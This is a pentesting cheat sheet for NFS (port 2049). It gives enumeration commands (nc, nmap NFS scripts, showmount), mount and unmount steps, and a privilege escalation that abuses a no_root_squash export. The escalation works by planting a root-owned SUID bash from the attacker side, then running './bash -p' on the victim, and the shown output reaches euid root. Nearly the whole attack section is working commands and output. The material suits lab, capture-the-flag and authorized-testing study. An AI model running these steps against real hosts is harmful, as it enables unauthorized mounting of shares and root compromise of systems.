2049 - NFS

Information

Default Port: 2049

PORT      STATE SERVICE
2049/tcp  open  nfs                                                                                                        

Enumeration

nc -vn 192.168.1.2 2049
timeout 0.1 bash -c "nc -nv 192.168.1.2 2049"
nmap -p2049 -sS 192.168.1.2
nmap -p2049 -sVC 192.168.1.2
nmap -p2049 --script "nfs-*" 192.168.1.2
nmap -sV --script="nfs-showmount" 192.168.1.2

Directory

List

# apt-get install -y nfs-common

showmount -e 192.168.1.2
Export list for 192.168.1.2:
/var/www/html *

Mount

cd /dev/shm
mkdir nfs
mount -t nfs 192.168.1.2:/var/www/html /dev/shm/nfs -nolock
cd nfs
ls -l

Umount

umount /dev/shm/nfs

# error (in use)
umount -l /dev/shm/nfs
umount -f /dev/shm/nfs

Files

/etc/exports
/etc/lib/nfs/etab

Privilege Escalation

no_root_squash

Detect

low@lower3:/$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/var/www/html/       *(rw,sync,insecure,no_root_squash,no_subtree_check)

Abuse

Victim

low@lower3:/$ cd /var/www/html/
low@lower3:/var/www/html$ cp /usr/bin/bash .

Attacker

❯ chown root:root bash
❯ chmod 4755 bash

Victim

low@lower3:/var/www/html$ ./bash -p
bash-5.1# id ; hostname
uid=1000(low) gid=1000(low) euid=0(root) groups=1000(low)